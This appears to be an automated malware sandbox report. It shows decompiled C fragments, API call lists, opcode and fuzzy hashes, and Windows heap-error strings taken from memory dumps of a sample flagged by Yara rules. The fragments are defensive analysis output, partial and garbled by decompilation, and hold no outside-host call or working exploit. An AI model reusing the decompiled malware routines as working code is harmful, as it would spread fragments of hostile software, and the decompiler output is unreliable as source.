                                                                            • Opcode ID: 3ccea16eb9248a5c1c883330dd2185a63f6a4ed1d5ab9253100b5bed238a9b7b
                                                                            • Instruction ID: a98e482e59c9d48d5776b94b7d35764932c8003b825f5d011e2befbeb57d2b89
                                                                            • Opcode Fuzzy Hash: 3ccea16eb9248a5c1c883330dd2185a63f6a4ed1d5ab9253100b5bed238a9b7b
                                                                            • Instruction Fuzzy Hash: 3F90027121180542D30066A98C54B0B0105A7D0743F51C129A0544594CC95588616AA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 1191a6605b43beba09210db359641142a26acb537feacaa3f7b4dba144a968b7
                                                                            • Instruction ID: 70b2202530335d2914ab84f4fb38c1c09a5cdc3b8c46df0578f302b0b1425fae
                                                                            • Opcode Fuzzy Hash: 1191a6605b43beba09210db359641142a26acb537feacaa3f7b4dba144a968b7
                                                                            • Instruction Fuzzy Hash: 23900275211005030205A699474450B0146A7D5791351C035F1405590CD661886166A1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: d99b0ddc88cc195b6060a36d3527d49cd3785a900fc679a03d02f048869d0c31
                                                                            • Instruction ID: 9c8db0b328e75360a7fe6d7b18056a289708f1d82300209dc61c67c768338567
                                                                            • Opcode Fuzzy Hash: d99b0ddc88cc195b6060a36d3527d49cd3785a900fc679a03d02f048869d0c31
                                                                            • Instruction Fuzzy Hash: 409002B12020050342057299845461A410AA7E0641B51C035E14045D0DC565889176A5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 5ab47ceba701452979e1553b1874753d74861fbc22cba2f79833117cd501359c
                                                                            • Instruction ID: 5e5333662b22df15793acecf6381390bd5ec866c4d6283beecac2649f26c113f
                                                                            • Opcode Fuzzy Hash: 5ab47ceba701452979e1553b1874753d74861fbc22cba2f79833117cd501359c
                                                                            • Instruction Fuzzy Hash: 5790027120100902D20066D9944864A0105A7E0741F51D025A5414595EC6A5889176B1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 4d25ca6ae4889dce26d3b0afd7add4274be323034570dc02efe9999fca6a12bd
                                                                            • Instruction ID: 2ada95daeb45712baae78adbbd2cc4e101e6c370c15b2084963390a66e3fe133
                                                                            • Opcode Fuzzy Hash: 4d25ca6ae4889dce26d3b0afd7add4274be323034570dc02efe9999fca6a12bd
                                                                            • Instruction Fuzzy Hash: AF90027921300502D2807299944860E0105A7D1642F91D429A0405598CC955886967A1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 23c3e8def8badfd2fba1389a22f57c37028285254045773a4902a225670acfe3
                                                                            • Instruction ID: c954002aa9b1483d089318ef291aa43d8d106d068f3647e350715cd0da1d599f
                                                                            • Opcode Fuzzy Hash: 23c3e8def8badfd2fba1389a22f57c37028285254045773a4902a225670acfe3
                                                                            • Instruction Fuzzy Hash: A690027130100503D2407299945860A4105F7E1741F51D025E0804594CD955885667A2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 3a74db76d8d18a4ce71c8c26f73bb17069a1fc66b82fc630409a0e242d3fe654
                                                                            • Instruction ID: 375cbcf342647671a945613ca3714b27eec656e22288da9f88c17b1ba19d9bc6
                                                                            • Opcode Fuzzy Hash: 3a74db76d8d18a4ce71c8c26f73bb17069a1fc66b82fc630409a0e242d3fe654
                                                                            • Instruction Fuzzy Hash: 7E90027131114902D2106299C44470A0105A7D1641F51C425A0C14598DC6D5889176A2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 7849122b9b415eb1aac399d825a935c61beddc7413b46dd56534f665bc43a663
                                                                            • Instruction ID: d12be6528896aaa14987a32c7604b7f365e9c85e099e39024f51dc7ede97cc4d
                                                                            • Opcode Fuzzy Hash: 7849122b9b415eb1aac399d825a935c61beddc7413b46dd56534f665bc43a663
                                                                            • Instruction Fuzzy Hash: 9E90027120100D02D2807299844464E0105A7D1741F91C029A0415694DCA558A597BE1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: af5560d44078e0e6853a4b97153b71bb333cf9a9d9a876fdf1b72a15798fcbb9
                                                                            • Instruction ID: ee58d6cf023dd0e5782a87d2698c21aca8b1c1d723a52a11e737e77442659240
                                                                            • Opcode Fuzzy Hash: af5560d44078e0e6853a4b97153b71bb333cf9a9d9a876fdf1b72a15798fcbb9
                                                                            • Instruction Fuzzy Hash: 0F90027120108D02D2106299C44474E0105A7D0741F55C425A4814698DC6D5889176A1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.299772162.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 9d06256989bfe96ad7de7a63f8bdf9db14966219433187ebea19fabadcfe590e
                                                                            • Instruction ID: fecb9998d56daf9cfaa78a55d0f1ea928f7019af28acdd4276aec55bf8742b64
                                                                            • Opcode Fuzzy Hash: 9d06256989bfe96ad7de7a63f8bdf9db14966219433187ebea19fabadcfe590e
                                                                            • Instruction Fuzzy Hash: 4C212BB2D4020857CB10E6649E42BFF736C9B50304F04017FE989A2181F639AB498BA7
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 76%
                                                                            			E004188D2(intOrPtr __eax, intOrPtr* __ebx, void* __ecx, void* _a4, long _a8, void* _a12, long _a16, long _a20) {
                                                                            				char _v0;
                                                                            				void* __esi;
                                                                            				void* __ebp;
                                                                            				void* _t12;
                                                                            
                                                                            				_push(cs);
                                                                            				asm("cmpsd");
                                                                            				asm("lodsd");
                                                                            				 *0x75677a62 = __eax;
                                                                            				if( *__ebx >= __ecx) {
                                                                            					asm("adc al, 0x9");
                                                                            					 *((intOrPtr*)(__eax)) =  *((intOrPtr*)(__eax)) + __eax;
                                                                            					_t3 =  &_a12; // 0x413546
                                                                            					_t12 = RtlAllocateHeap( *_t3, _a16, _a20); // executed
                                                                            					return _t12;
                                                                            				} else {
                                                                            					__ebp = __esp;
                                                                            					__eax = _v0;
                                                                            					__ecx =  *((intOrPtr*)(__eax + 0x10));
                                                                            					_t6 = __eax + 0xc74; // 0xc74
                                                                            					__esi = _t6;
                                                                            					__eax = _a8;
                                                                            					__ecx = _a4;
                                                                            					__eax = RtlFreeHeap(_a4, _a8, _a12); // executed
                                                                            					__esi = __esi;
                                                                            					__ebp = __ebp;
                                                                            					return __eax;
                                                                            				}
                                                                            			}








                                                                            APIs
                                                                            • RtlAllocateHeap.NTDLL(F5A,?,00413CBF,00413CBF,?,00413546,?,?,?,?,?,00000000,00408B23,?), ref: 004188CD
                                                                            • RtlFreeHeap.NTDLL(00000060,00408B23,?,?,00408B23,00000060,00000000,00000000,?,?,00408B23,?,00000000), ref: 0041890D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.299772162.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Heap$AllocateFree
                                                                            • String ID: F5A
                                                                            • API String ID: 2488874121-683449296
                                                                            • Opcode ID: 37f69f484ca45f7459a1b64255040918bd6cf93917e722737f6b46c40e891233
                                                                            • Instruction ID: 44880b60090aabbdcaa74a99a08852773980f0c1a0aa9405f98cdf5d61cc9b4a
                                                                            • Opcode Fuzzy Hash: 37f69f484ca45f7459a1b64255040918bd6cf93917e722737f6b46c40e891233
                                                                            • Instruction Fuzzy Hash: 48F0AFB2210208AFDB14EF59DC45EE733A8EF88350F018599FD0897341E630EA10CBB5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 79%
                                                                            			E004188A0(intOrPtr _a4, char _a8, long _a12, long _a16) {
                                                                            				intOrPtr* _t8;
                                                                            				void* _t10;
                                                                            
                                                                            				_t8 = E004191D0(_a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
                                                                            				asm("adc al, 0x9");
                                                                            				 *_t8 =  *_t8 + _t8;
                                                                            				_t6 =  &_a8; // 0x413546
                                                                            				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
                                                                            				return _t10;
                                                                            			}





                                                                            APIs
                                                                            • RtlAllocateHeap.NTDLL(F5A,?,00413CBF,00413CBF,?,00413546,?,?,?,?,?,00000000,00408B23,?), ref: 004188CD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.299772162.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocateHeap
                                                                            • String ID: F5A
                                                                            • API String ID: 1279760036-683449296
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 82%
                                                                            			E00407290(void* __eflags, intOrPtr _a4, long _a8) {
                                                                            				char _v67;
                                                                            				char _v68;
                                                                            				void* _t12;
                                                                            				intOrPtr* _t13;
                                                                            				int _t14;
                                                                            				long _t21;
                                                                            				intOrPtr* _t25;
                                                                            				void* _t26;
                                                                            				void* _t30;
                                                                            
                                                                            				_t30 = __eflags;
                                                                            				_v68 = 0;
                                                                            				E0041A130( &_v67, 0, 0x3f);
                                                                            				E0041AD10( &_v68, 3);
                                                                            				_t12 = E00409B50(_t30, _a4 + 0x1c,  &_v68); // executed
                                                                            				_t13 = E00413E60(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
                                                                            				_t25 = _t13;
                                                                            				if(_t25 != 0) {
                                                                            					_t21 = _a8;
                                                                            					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
                                                                            					_t32 = _t14;
                                                                            					if(_t14 == 0) {
                                                                            						_t14 =  *_t25(_t21, 0x8003, _t26 + (E004092B0(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
                                                                            					}
                                                                            					return _t14;
                                                                            				}
                                                                            				return _t13;
                                                                            			}












                                                                            APIs
                                                                            • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072EA
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.299772162.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: MessagePostThread
                                                                            • String ID:
                                                                            • API String ID: 1836367815-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 56%
                                                                            			E0040D180(intOrPtr _a4, intOrPtr _a8) {
                                                                            				char _v8;
                                                                            				char _v526;
                                                                            				char _v528;
                                                                            				void* _t14;
                                                                            				intOrPtr _t15;
                                                                            
                                                                            				_push(0x206);
                                                                            				 *((intOrPtr*)(0)) =  *((intOrPtr*)(0));
                                                                            				_push(0);
                                                                            				_push( &_v526);
                                                                            				_v8 = 0;
                                                                            				_v528 = 0;
                                                                            				E0041A130();
                                                                            				_t23 = _a4;
                                                                            				E0040A020(0, _a4,  &_v528, 0x10);
                                                                            				_t14 = E0040D090(_a4,  &_v528,  &_v8); // executed
                                                                            				_t15 = _v8;
                                                                            				if(_t14 == 0) {
                                                                            					__eflags = _t15;
                                                                            					if(_t15 != 0) {
                                                                            						__eflags = _a8;
                                                                            						if(_a8 == 0) {
                                                                            							E00418700(_t23, _t15);
                                                                            						}
                                                                            					}
                                                                            					__eflags = 0;
                                                                            					return 0;
                                                                            				} else {
                                                                            					if(_t15 != 0) {
                                                                            						E00418700(_t23, _t15);
                                                                            					}
                                                                            					return 1;
                                                                            				}
                                                                            			}








                                                                            APIs
                                                                            • GetCursorFrameInfo.USER32 ref: 0040D1FD
                                                                              • Part of subcall function 00418700: NtClose.NTDLL(00413D60,?,?,00413D60,00408B23,FFFFFFFF), ref: 00418725
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.299772162.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseCursorFrameInfo
                                                                            • String ID:
                                                                            • API String ID: 3080600085-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 25%
                                                                            			E00409B43(void* __eax, void* __edi, void* __eflags, void* _a8, void* _a16) {
                                                                            				void* _v0;
                                                                            				void* _v4;
                                                                            				void* _v8;
                                                                            				void* _v12;
                                                                            				void* _v528;
                                                                            				void* _t20;
                                                                            				void* _t39;
                                                                            
                                                                            				asm("loop 0x2f");
                                                                            				asm("enter 0x38e4, 0x39");
                                                                            				asm("outsb");
                                                                            				_t20 = _t39;
                                                                            				if (__eflags >= 0) goto L7;
                                                                            			}










                                                                            APIs
                                                                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BC2
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.299772162.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Load
                                                                            • String ID:
                                                                            • API String ID: 2234796835-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E004188E0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                                                            				char _t10;
                                                                            
                                                                            				_t3 = _a4 + 0xc74; // 0xc74
                                                                            				E004191D0(_a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                                                                            				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                                                            				return _t10;
                                                                            			}




                                                                            APIs
                                                                            • RtlFreeHeap.NTDLL(00000060,00408B23,?,?,00408B23,00000060,00000000,00000000,?,?,00408B23,?,00000000), ref: 0041890D
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.299772162.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FreeHeap
                                                                            • String ID:
                                                                            • API String ID: 3298025750-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E00418A40(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                                                            				int _t10;
                                                                            
                                                                            				E004191D0(_a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
                                                                            				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                                                            				return _t10;
                                                                            			}




                                                                            APIs
                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFD2,0040CFD2,00000041,00000000,?,00408B95), ref: 00418A70
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.299772162.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: LookupPrivilegeValue
                                                                            • String ID:
                                                                            • API String ID: 3899507212-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E00418920(intOrPtr _a4, int _a8) {
                                                                            
                                                                            				_t5 = _a4;
                                                                            				E004191D0(_a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
                                                                            				ExitProcess(_a8);
                                                                            			}



                                                                            APIs
                                                                            • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418948
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.299772162.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ExitProcess
                                                                            • String ID:
                                                                            • API String ID: 621844428-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Non-executed Functions

                                                                            Strings
                                                                            • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0112B38F
                                                                            • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 0112B39B
                                                                            • The resource is owned exclusively by thread %p, xrefs: 0112B374
                                                                            • The resource is owned shared by %d threads, xrefs: 0112B37E
                                                                            • read from, xrefs: 0112B4AD, 0112B4B2
                                                                            • *** An Access Violation occurred in %ws:%s, xrefs: 0112B48F
                                                                            • *** Inpage error in %ws:%s, xrefs: 0112B418
                                                                            • *** Resource timeout (%p) in %ws:%s, xrefs: 0112B352
                                                                            • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0112B47D
                                                                            • *** enter .exr %p for the exception record, xrefs: 0112B4F1
                                                                            • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0112B484
                                                                            • *** enter .cxr %p for the context, xrefs: 0112B50D
                                                                            • an invalid address, %p, xrefs: 0112B4CF
                                                                            • write to, xrefs: 0112B4A6
                                                                            • Go determine why that thread has not released the critical section., xrefs: 0112B3C5
                                                                            • *** then kb to get the faulting stack, xrefs: 0112B51C
                                                                            • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0112B476
                                                                            • *** A stack buffer overrun occurred in %ws:%s, xrefs: 0112B2F3
                                                                            • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0112B2DC
                                                                            • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0112B3D6
                                                                            • The instruction at %p tried to %s , xrefs: 0112B4B6
                                                                            • This failed because of error %Ix., xrefs: 0112B446
                                                                            • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0112B53F
                                                                            • The critical section is owned by thread %p., xrefs: 0112B3B9
                                                                            • The instruction at %p referenced memory at %p., xrefs: 0112B432
                                                                            • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0112B305
                                                                            • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0112B323
                                                                            • <unknown>, xrefs: 0112B27E, 0112B2D1, 0112B350, 0112B399, 0112B417, 0112B48E
                                                                            • a NULL pointer, xrefs: 0112B4E0
                                                                            • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0112B314
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                            • API String ID: 0-108210295
                                                                            • Opcode ID: 2a4d08e0dcc14b66d76b4793b876a965533a79653d7c5253720f1e37c62b25ba
                                                                            • Instruction ID: 56d333dce35efbe779d503ac9ce3b3987f09fdef5acc0900e30961eff3364c25
                                                                            • Opcode Fuzzy Hash: 2a4d08e0dcc14b66d76b4793b876a965533a79653d7c5253720f1e37c62b25ba
                                                                            • Instruction Fuzzy Hash: 2B812835A08220FFDB2E6F4ACC89E7B3F2AEF56A95F414048F5441F152D3A18461EB76
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 44%
                                                                            			E01131C06() {
                                                                            				signed int _t27;
                                                                            				char* _t104;
                                                                            				char* _t105;
                                                                            				intOrPtr _t113;
                                                                            				intOrPtr _t115;
                                                                            				intOrPtr _t117;
                                                                            				intOrPtr _t119;
                                                                            				intOrPtr _t120;
                                                                            
                                                                            				_t105 = 0x10548a4;
                                                                            				_t104 = "HEAP: ";
                                                                            				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                            					_push(_t104);
                                                                            					E0107B150();
                                                                            				} else {
                                                                            					E0107B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                            				}
                                                                            				_push( *0x116589c);
                                                                            				E0107B150("Heap error detected at %p (heap handle %p)\n",  *0x11658a0);
                                                                            				_t27 =  *0x1165898; // 0x0
                                                                            				if(_t27 <= 0xf) {
                                                                            					switch( *((intOrPtr*)(_t27 * 4 +  &M01131E96))) {
                                                                            						case 0:
                                                                            							_t105 = "heap_failure_internal";
                                                                            							goto L21;
                                                                            						case 1:
                                                                            							goto L21;
                                                                            						case 2:
                                                                            							goto L21;
                                                                            						case 3:
                                                                            							goto L21;
                                                                            						case 4:
                                                                            							goto L21;
                                                                            						case 5:
                                                                            							goto L21;
                                                                            						case 6:
                                                                            							goto L21;
                                                                            						case 7:
                                                                            							goto L21;
                                                                            						case 8:
                                                                            							goto L21;
                                                                            						case 9:
                                                                            							goto L21;
                                                                            						case 0xa:
                                                                            							goto L21;
                                                                            						case 0xb:
                                                                            							goto L21;
                                                                            						case 0xc:
                                                                            							goto L21;
                                                                            						case 0xd:
                                                                            							goto L21;
                                                                            						case 0xe:
                                                                            							goto L21;
                                                                            						case 0xf:
                                                                            							goto L21;
                                                                            					}
                                                                            				}
                                                                            				L21:
                                                                            				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                            					_push(_t104);
                                                                            					E0107B150();
                                                                            				} else {
                                                                            					E0107B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                            				}
                                                                            				_push(_t105);
                                                                            				E0107B150("Error code: %d - %s\n",  *0x1165898);
                                                                            				_t113 =  *0x11658a4; // 0x0
                                                                            				if(_t113 != 0) {
                                                                            					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                            						_push(_t104);
                                                                            						E0107B150();
                                                                            					} else {
                                                                            						E0107B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                            					}
                                                                            					E0107B150("Parameter1: %p\n",  *0x11658a4);
                                                                            				}
                                                                            				_t115 =  *0x11658a8; // 0x0
                                                                            				if(_t115 != 0) {
                                                                            					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                            						_push(_t104);
                                                                            						E0107B150();
                                                                            					} else {
                                                                            						E0107B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                            					}
                                                                            					E0107B150("Parameter2: %p\n",  *0x11658a8);
                                                                            				}
                                                                            				_t117 =  *0x11658ac; // 0x0
                                                                            				if(_t117 != 0) {
                                                                            					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                            						_push(_t104);
                                                                            						E0107B150();
                                                                            					} else {
                                                                            						E0107B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                            					}
                                                                            					E0107B150("Parameter3: %p\n",  *0x11658ac);
                                                                            				}
                                                                            				_t119 =  *0x11658b0; // 0x0
                                                                            				if(_t119 != 0) {
                                                                            					L41:
                                                                            					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                            						_push(_t104);
                                                                            						E0107B150();
                                                                            					} else {
                                                                            						E0107B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                            					}
                                                                            					_push( *0x11658b4);
                                                                            					E0107B150("Last known valid blocks: before - %p, after - %p\n",  *0x11658b0);
                                                                            				} else {
                                                                            					_t120 =  *0x11658b4; // 0x0
                                                                            					if(_t120 != 0) {
                                                                            						goto L41;
                                                                            					}
                                                                            				}
                                                                            				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                            					_push(_t104);
                                                                            					E0107B150();
                                                                            				} else {
                                                                            					E0107B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                            				}
                                                                            				return E0107B150("Stack trace available at %p\n", 0x11658c0);
                                                                            			}












                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                                            • API String ID: 0-2897834094
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 59%
                                                                            			E01134AEF(void* __ecx, signed int __edx, intOrPtr* _a8, signed int* _a12, signed int* _a16, intOrPtr _a20, intOrPtr _a24) {
                                                                            				signed int _v6;
                                                                            				signed int _v8;
                                                                            				signed int _v12;
                                                                            				signed int _v16;
                                                                            				signed int _v20;
                                                                            				signed int _v24;
                                                                            				signed int _v28;
                                                                            				void* __ebx;
                                                                            				void* __edi;
                                                                            				void* __esi;
                                                                            				void* __ebp;
                                                                            				signed int _t189;
                                                                            				intOrPtr _t191;
                                                                            				intOrPtr _t210;
                                                                            				signed int _t225;
                                                                            				signed char _t231;
                                                                            				intOrPtr _t232;
                                                                            				unsigned int _t245;
                                                                            				intOrPtr _t249;
                                                                            				intOrPtr _t259;
                                                                            				signed int _t281;
                                                                            				signed int _t283;
                                                                            				intOrPtr _t284;
                                                                            				signed int _t288;
                                                                            				signed int* _t294;
                                                                            				signed int* _t298;
                                                                            				intOrPtr* _t299;
                                                                            				intOrPtr* _t300;
                                                                            				signed int _t307;
                                                                            				signed int _t309;
                                                                            				signed short _t312;
                                                                            				signed short _t315;
                                                                            				signed int _t317;
                                                                            				signed int _t320;
